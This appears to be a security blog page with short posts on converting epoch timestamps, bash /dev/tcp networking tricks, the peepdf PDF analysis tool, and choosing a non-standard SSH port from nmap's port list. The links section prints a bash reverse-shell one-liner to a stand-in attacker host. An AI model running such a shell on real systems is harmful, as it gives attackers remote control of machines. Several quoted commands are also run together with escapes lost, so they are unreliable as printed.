Dynamic conversion of epoch timestamps in logs
In the course of your logs or text processing, you may come across certain timestamps in epoch format. Whilst there's always online resources to assist with the conversion of such timestamps, it may not be the best way if you need to keep the timestamp "secret" during then, or if you have many timestamps to convert going by the thousands, millions, etc.
Whilst there's always free tools like Splunk which is available for free to the masses (and yes, it does automatically convert epoch timestamps for you), there's always our "humble" awk. 
Interesting Links
Will start linking some of the stuff that potentially would be interesting and useful here. Let's start off with an alternative BASH-fu technique to initiate and listen TCP connections from a (supposedly pwned) Linux box:
http://blog.rootshell.be/2011/05/05/binbash-phone-home/
Now the question will arise: when those network redirection could be helpful? First, bash can used without third party tools to grab data from the network. The example below fetch this blog main page:
exec 5<> /dev/tcp/blog.rootshell.be/80 printf "GET / HTTP/1.0nn" >&5 cat <&5 exec 5>&-Very convenient if you don’t have link or curl installed. Just pipe the output to other commands. This can be used to generate dictionary files to conduct a bruteforce attack:
exec 5<> /dev/tcp/blog.rootshell.be/80 printf "GET / HTTP/1.0nn" >&5 cat <&5 exec 5>&- | sed -e 's/<[!a-zA-Z/][^>]*>//g' foo.tmp | tr " " "n"Another nice example is to make bash “phone home”. Let’s launch a reverse shell to an attacker box:
victim# bash 0</dev/tcp/www.attacker.com/8888 1>&0 2>&0As the bash shell is very common, it can be very interesting! Just use your imagination. to find other examples. A final remark: this feature is not available on all pre-compiled or packaged bash instances! Some UNIX flavors consider it as dangerous (which is true!). If you want to compile your own bash with this feature enabled, the configuration flag is “–enable-net-redirections“.
Also, a tool to help with PDF creation/modification/analysis. Sounds promising:
http://code.google.com/p/peepdf/
peepdf is a Python tool to explore PDF files in order to find out if the file can be harmful or not. The aim of this tool is to provide all the necessary components that a security researcher could need in a PDF analysis without using 3 or 4 tools to make all the tasks. With peepdf it's possible to see all the objects in the document showing the suspicious elements, supports all the most used filters and encodings, it can parse different versions of a file, object streams and encrypted files. With the installation of Spidermonkey and Libemu it provides Javascript and shellcode analysis wrappers too. Apart of this it's able to create new PDF files and to modify existent ones.
Added Layer Of Obscurity: Finding a non-standard port for your service
Designing your security model using only obscurity is always a bad idea, but after sound measures have been put in place, an added layer of obscurity might make the service/account harder to find for the malicious, and lower the resources wasted by their brute forcing, etc.
An example would be the changing of private services (e.g. SSH) to run on non-standard ports (I see this frequently recommended as part of hardening guides anyway; there's port knocking too which could be even better, but that's not the point of this post).
In the example of hiding SSH ports, the question then comes: what port to use? One of the many ways is to make use of nmap's frequently used ports list to help make a decision. Nmap scans using the top 1000 frequently used ports in a normal scan (although we change the scan to scan based on any top n used ports too). So we run this in a shell to list the top 1000 (or n of your fancy) used ports:
cat /usr/share/nmap/nmap-services | \
awk '{print $3 "\t" $2 "\t\t" $1}' | \
sort -nr | head -n1000 | less
Let's break this command down:
cat /usr/share/nmap/nmap-services prints out the contents of the nmap-services file (used to track the probabilities of the ports used) to STDOUT.
awk '{print $3 "\t" $2 "\t\t" $1}' formats the contents of the nmap-services for the sort command to work on.
sort -nr sorts the entries by reverse numerical order.
head -n1000 shows only the top 1000 lines of output (change to any number you wish, or remove altogether to see the full list)
less displays the output in a scrollable, searchable manner.
On an ending note, it probably would be a bad idea to go straight for the last entries in the sorted list for your port selections. Remember: we want to be unpredictable, and not simply different.